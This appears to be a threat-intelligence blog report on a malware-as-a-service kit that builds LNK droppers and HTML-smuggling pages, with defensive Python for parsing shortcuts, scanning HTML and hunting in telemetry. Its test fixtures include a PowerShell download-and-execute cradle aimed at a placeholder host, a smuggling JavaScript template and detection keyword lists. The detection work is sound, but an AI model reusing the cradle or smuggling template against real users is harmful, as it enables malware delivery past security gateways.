Malware-as-a-Service: New 'Point-and-Click' Kit Bypasses Security to Deliver Payloads via LNK and HTML

 

By CyberDudeBivash • October 04, 2025 • Threat Intelligence Report
 
cyberdudebivash.com | cyberbivash.blogspot.com

Disclosure: This is a technical threat analysis for security professionals. It contains affiliate links to relevant security solutions and training. Your support helps fund our independent research.

 

Chapter 1: The Industrialization of Hacking — The Rise of "Point-and-Click" MaaS

 

The cybercrime ecosystem has undergone a dramatic professionalization. Sophisticated attack techniques are no longer the exclusive domain of elite state actors. They are now packaged, productized, and sold as a service. We are tracking a new Malware-as-a-Service (MaaS) platform, which we're calling **"EasySploit,"** that exemplifies this trend. It provides a simple, graphical "point-and-click" web interface that allows even low-skilled criminals to generate highly evasive dropper files in seconds. This democratization of advanced TTPs is dramatically increasing the volume and sophistication of threats that security teams face every day.


 

Chapter 2: Threat Analysis Part 1 — The Automated LNK Dropper Builder

 

The first module of the EasySploit platform automates the creation of malicious LNK files, a TTP used by a wide range of malware, including the **SORVEPOTEL worm**.

The Criminal's Workflow:

  1. The criminal subscribes to the EasySploit service.
  2. In the web UI, they simply paste the URL of their final payload (e.g., an infostealer hosted on a remote server).
  3. They click "Generate LNK."
  4. The EasySploit backend automatically generates a PowerShell one-liner to download and execute the payload, encodes it in Base64, and embeds it into the "Target" field of a Windows Shortcut (.LNK) file.
  5. The criminal downloads the ready-to-use malicious LNK file and includes it in their phishing campaign.
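
An analyst meets this workflow from the artifact side: the shortcut's command-line arguments are where the encoded one-liner ends up, and they can be read out statically without ever launching the file. The Python below is an added example written for this report; it is not the author's code and not anything from the EasySploit kit. It walks the .lnk structures as laid out in the public MS-SHLLINK specification, decodes a -EncodedCommand value (including the -e, -ec, -en and -enc short forms that powershell.exe accepts) and flags download-and-execute vocabulary. The fixture builder, the two sample shortcuts, the token list and the output field names are assumptions made for the example; the "malicious" sample points at the reserved hostname example.invalid, which never resolves.

```python
import base64
import re
import struct

# ShellLinkHeader constants from the public MS-SHLLINK spec: fixed header size and
# the LinkCLSID {00021401-0000-0000-C000-000000000046} in its on-disk byte order.
LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")

# LinkFlags bits that decide which structures follow the header.
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

# powershell.exe accepts -EncodedCommand and the short forms -e, -ec, -en, -enc;
# the value is Base64 of a UTF-16LE string.
ENCODED_ARG = re.compile(r"-(?:encodedcommand|enc|en|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)

# Cradle vocabulary (assumed list), matched case-insensitively against the raw
# arguments with the Base64 blob removed, plus the decoded command.
SUSPICIOUS_TOKENS = ("iex", "invoke-expression", "net.webclient", "downloadstring",
                     "downloadfile", "invoke-webrequest", "-windowstyle hidden")


def parse_lnk(data: bytes) -> dict:
    """Skip the optional IDList and LinkInfo blocks, then read the StringData fields."""
    header_size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
    if header_size != LNK_HEADER_SIZE or clsid != LNK_CLSID:
        raise ValueError("not a Shell Link (.lnk) file")
    off = LNK_HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:      # IDListSize (2 bytes) + IDList
        (size,) = struct.unpack_from("<H", data, off)
        off += 2 + size
    if flags & HAS_LINK_INFO:                # LinkInfoSize (4 bytes) covers the whole block
        (size,) = struct.unpack_from("<I", data, off)
        off += size
    strings = {}
    # StringData entries come in this fixed order, each as CountCharacters + characters.
    for bit, name in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                      (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                      (HAS_ICON_LOCATION, "icon_location")):
        if not flags & bit:
            continue
        (count,) = struct.unpack_from("<H", data, off)
        off += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = data[off:off + count * width]
        off += count * width
        strings[name] = raw.decode("utf-16-le" if width == 2 else "cp1252", errors="replace")
    return {"flags": flags, "strings": strings}


def assess_lnk(data: bytes) -> dict:
    """Decode a -EncodedCommand payload, if any, and collect cradle indicators."""
    args = parse_lnk(data)["strings"].get("arguments", "")
    indicators, decoded = [], None
    match = ENCODED_ARG.search(args)
    if match:
        indicators.append("encoded-command")
        try:
            decoded = base64.b64decode(match.group(1)).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            indicators.append("undecodable-base64")
    haystack = (ENCODED_ARG.sub(" ", args) + " " + (decoded or "")).lower()
    indicators += [tok for tok in SUSPICIOUS_TOKENS if tok in haystack]
    return {"arguments": args, "decoded_command": decoded,
            "indicators": indicators, "suspicious": bool(indicators)}


def build_lnk(arguments: str) -> bytes:
    """Constructed test fixture: a minimal shortcut whose only StringData is the
    argument string (a real dropper also carries an IDList naming powershell.exe)."""
    header = struct.pack("<I16sIIQQQIIIHHII", LNK_HEADER_SIZE, LNK_CLSID,
                         HAS_ARGUMENTS | IS_UNICODE,
                         0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)  # attrs, times, size, icon, SW_SHOWNORMAL, rest
    return header + struct.pack("<H", len(arguments)) + arguments.encode("utf-16-le")


# Constructed samples; example.invalid is a reserved name that never resolves.
SAMPLE_COMMAND = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')"
SAMPLE_B64 = base64.b64encode(SAMPLE_COMMAND.encode("utf-16-le")).decode("ascii")
MALICIOUS_LNK = build_lnk(f"-NoProfile -WindowStyle Hidden -EncodedCommand {SAMPLE_B64}")
BENIGN_LNK = build_lnk(r"-NoProfile -File C:\Scripts\nightly-backup.ps1")

if __name__ == "__main__":
    for label, blob in (("malicious", MALICIOUS_LNK), ("benign", BENIGN_LNK)):
        print(label, assess_lnk(blob))
```

The Base64 blob is stripped before token matching so that random letter runs inside the encoding cannot trigger a keyword hit; the decoded command, not the encoding, is what gets judged. A benign administrative shortcut that merely runs a script file produces no indicators, which is the contrast a triage script needs before it is trusted on a mail-gateway quarantine.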

 

Chapter 3: Threat Analysis Part 2 — The Automated HTML Smuggling Builder

 

The platform's more advanced module automates **HTML Smuggling**, a powerful technique for bypassing network security gateways.

The Criminal's Workflow:

  1. The criminal uploads their malicious payload (e.g., a ZIP or ISO file containing a RAT) to the EasySploit platform.
  2. They click "Generate HTML."
  3. The backend service Base64-encodes the entire malicious file and embeds it inside a JavaScript "Blob" within a single HTML file.
  4. The criminal downloads this HTML file. When the victim receives and opens this "harmless" `.html` attachment, the JavaScript inside it reconstructs the malicious ISO/ZIP file from the Blob and triggers a download in the user's browser, effectively "smuggling" it past the email gateway's file-type filters.
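
Because the gateway only ever sees an HTML attachment, the place to catch this is static inspection of the HTML itself: the script idioms that rebuild a file client-side, and the large Base64 literal they consume. The Python below is an added example written for this report, not the author's code and not anything from the EasySploit platform. It lists the JavaScript idioms present, decodes every long quoted Base64 run, identifies the rebuilt container by its magic bytes (the extensions the report names plus a few common ones) and, for a ZIP, lists its members so the next stage is visible without executing anything. The constructed fixture page, the idiom list, the 64-character threshold and the result field names are all assumptions made for the example.

```python
import base64
import io
import re
import zipfile

# JavaScript idioms used to rebuild a smuggled file in the browser and hand it to the user.
SCRIPT_IDIOMS = ("atob(", "new Blob(", "createObjectURL(", ".download", "msSaveOrOpenBlob", "Uint8Array")
SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
# A quoted Base64 run. Real smuggled archives run to tens of kilobytes; 64 is a lab threshold.
B64_LITERAL_RE = re.compile(r"""["']([A-Za-z0-9+/]{64,}={0,2})["']""")


def container_type(data: bytes):
    """Identify the rebuilt file by magic bytes: the report's extensions plus a few common ones."""
    if data.startswith(b"PK\x03\x04"):
        return "zip"
    if data[0x8001:0x8006] == b"CD001":       # ISO 9660 primary volume descriptor
        return "iso"
    if data[-512:].startswith(b"conectix"):   # VHD footer cookie
        return "vhd"
    if data.startswith(b"MZ"):
        return "pe"
    if data.startswith(b"\x1f\x8b"):
        return "gzip"
    if data.startswith(b"Rar!"):
        return "rar"
    if data.startswith(b"7z\xbc\xaf\x27\x1c"):
        return "7z"
    return None


def scan_html(html: str) -> dict:
    """List the script idioms present, decode every embedded container, and give a verdict."""
    scripts = " ".join(SCRIPT_RE.findall(html))
    idioms = [tok for tok in SCRIPT_IDIOMS if tok in scripts]
    payloads = []
    for literal in B64_LITERAL_RE.findall(html):
        try:
            blob = base64.b64decode(literal, validate=True)
        except ValueError:               # binascii.Error is a ValueError subclass
            continue
        kind = container_type(blob)
        if kind is None:
            continue
        entry = {"type": kind, "size": len(blob), "members": []}
        if kind == "zip":                # look inside: the members are the next stage
            try:
                entry["members"] = zipfile.ZipFile(io.BytesIO(blob)).namelist()
            except zipfile.BadZipFile:
                pass
        payloads.append(entry)
    # Both halves are needed: a decodable archive AND the code that rebuilds it client-side.
    suspicious = len(idioms) >= 2 and bool(payloads)
    return {"idioms": idioms, "payloads": payloads, "suspicious": suspicious}


def build_sample_html() -> str:
    """Constructed fixture: a one-file ZIP carried as Base64 in a small page that rebuilds it."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("readme.txt", "constructed sample, harmless text")
    b64 = base64.b64encode(buf.getvalue()).decode("ascii")
    return (
        "<html><body><p>Your document is ready.</p><script>\n"
        f'var data = "{b64}";\n'
        "var bytes = Uint8Array.from(atob(data), function (c) { return c.charCodeAt(0); });\n"
        'var blob = new Blob([bytes], { type: "application/octet-stream" });\n'
        'var link = document.createElement("a");\n'
        "link.href = URL.createObjectURL(blob);\n"
        'link.download = "document.zip";\n'
        "</script></body></html>"
    )


SAMPLE_HTML = build_sample_html()
BENIGN_HTML = "<html><body><p>Quarterly numbers attached separately.</p></body></html>"

if __name__ == "__main__":
    print(scan_html(SAMPLE_HTML))
    print(scan_html(BENIGN_HTML))
```

Requiring both a decodable container and at least two rebuild idioms keeps ordinary pages with inline images (a lone Base64 literal) and ordinary web apps (Blob handling without an embedded archive) out of the alert queue. Real kits often split or lightly obfuscate the Base64 string, so a production scanner should also join adjacent string literals and try common decoders before giving up on a literal.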

 

Chapter 4: The Defender's Playbook — Hunting for EasySploit's TTPs

 

Because these techniques abuse legitimate system features, detection must focus on the behavioral anomalies they create. This requires a modern **Endpoint Detection and Response (EDR)** solution.

Key Hunting Queries for Your SOC:

  • **To Detect the LNK Dropper:** Hunt for the parent-child relationship of the Windows shell launching PowerShell after a user clicks a shortcut.

        ParentProcess:explorer.exe AND ProcessName:powershell.exe AND (CommandLine CONTAINS "-EncodedCommand" OR CommandLine CONTAINS "IEX")

  • **To Detect HTML Smuggling:** Hunt for a browser process creating an unusually large file or a suspicious file type.

        Event_Type:FileCreation AND ProcessName IN ('chrome.exe', 'msedge.exe') AND FileExtension IN ('.iso', '.zip', '.img', '.vhd')

    Behavioral Defense is Key: An EDR platform is non-negotiable for detecting these modern, evasive techniques. **Kaspersky's EDR/XDR solutions** are built to detect these malicious behaviors and TTPs, regardless of the specific payload or how the dropper was generated.
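
The two hunting queries above, as an added example in runnable form over constructed telemetry; this is not the author's code and not any vendor's query language. It widens the first query slightly: powershell.exe accepts -e, -ec, -en and -enc as aliases of -EncodedCommand, so a literal match on "-EncodedCommand" alone misses the short forms. The event schema (field names such as parent_process and file_path), the extra browser names and the sample events are assumptions made for the example; the encoded command in the fixture is a harmless Write-Output, chosen only to give the flag its real shape.

```python
import base64
import re

# Rule 1, LNK dropper: the shell (the user double-clicked a shortcut) spawns PowerShell
# with an encoded command or an in-memory execution cue.  powershell.exe also accepts
# -e / -ec / -en / -enc for -EncodedCommand, so a literal "-EncodedCommand" match misses them.
ENCODED_FLAG = re.compile(r"(?:^|\s)-(?:encodedcommand|enc|en|ec|e)\s+[A-Za-z0-9+/=]{16,}", re.I)
IEX_RE = re.compile(r"\b(?:iex|invoke-expression)\b", re.I)
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# Rule 2, HTML smuggling: a browser writes a container the mail gateway would have blocked.
# Extensions are the report's list; the browser set is widened beyond Chrome and Edge.
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"}
CONTAINER_EXT = (".iso", ".zip", ".img", ".vhd")


def lnk_dropper_rule(ev: dict) -> bool:
    if ev.get("event_type") != "ProcessCreate":
        return False
    if ev.get("parent_process", "").lower() != "explorer.exe":
        return False
    if ev.get("process_name", "").lower() not in POWERSHELL:
        return False
    cmd = ev.get("command_line", "")
    return bool(ENCODED_FLAG.search(cmd) or IEX_RE.search(cmd))


def html_smuggling_rule(ev: dict) -> bool:
    if ev.get("event_type") != "FileCreate":
        return False
    if ev.get("process_name", "").lower() not in BROWSERS:
        return False
    return ev.get("file_path", "").lower().endswith(CONTAINER_EXT)


def hunt(events):
    """Run both rules over a batch and return (rule, event id) pairs in event order."""
    hits = []
    for ev in events:
        if lnk_dropper_rule(ev):
            hits.append(("lnk_dropper", ev["id"]))
        if html_smuggling_rule(ev):
            hits.append(("html_smuggling", ev["id"]))
    return hits


# Constructed telemetry in an assumed, vendor-neutral schema.  The encoded command is a
# harmless Write-Output so the fixture shows the flag shape without carrying a real cradle.
ENC_SAMPLE = base64.b64encode("Write-Output 'constructed sample'".encode("utf-16-le")).decode("ascii")
SAMPLE_EVENTS = [
    {"id": 1, "event_type": "ProcessCreate", "parent_process": "explorer.exe", "process_name": "powershell.exe",
     "command_line": f"powershell.exe -nop -w hidden -enc {ENC_SAMPLE}"},           # alias form
    {"id": 2, "event_type": "ProcessCreate", "parent_process": "explorer.exe", "process_name": "powershell.exe",
     "command_line": r"powershell.exe -File C:\Scripts\nightly-backup.ps1"},        # admin's own shortcut
    {"id": 3, "event_type": "ProcessCreate", "parent_process": "svchost.exe", "process_name": "powershell.exe",
     "command_line": f"powershell.exe -EncodedCommand {ENC_SAMPLE}"},               # scheduled task: out of scope
    {"id": 4, "event_type": "FileCreate", "process_name": "msedge.exe",
     "file_path": r"C:\Users\alice\Downloads\Invoice_Q3.iso"},                       # browser drops a disk image
    {"id": 5, "event_type": "FileCreate", "process_name": "msedge.exe",
     "file_path": r"C:\Users\alice\Downloads\report.pdf"},                           # ordinary download
    {"id": 6, "event_type": "FileCreate", "process_name": "outlook.exe",
     "file_path": r"C:\Users\alice\Downloads\archive.zip"},                          # not a browser
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(*hit)
```

Two gaps worth tuning for once the rules are live: a shortcut can launch cmd.exe first and let it start PowerShell, so a strict explorer.exe parent check should be widened to the grandparent; and browsers typically write a download under a temporary name and rename it on completion, so the file-creation rule should also consume rename events, or the final extension is never seen.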
 


About the Author

   

CyberDudeBivash is a cybersecurity strategist with 15+ years in malware analysis, threat hunting, and reverse engineering, advising SOC teams and CISOs across APAC. [Last Updated: October 04, 2025]

 

  #CyberDudeBivash #MaaS #Malware #LNK #HTMLsmuggling #CyberSecurity #ThreatHunting #InfoSec #EDR #Phishing
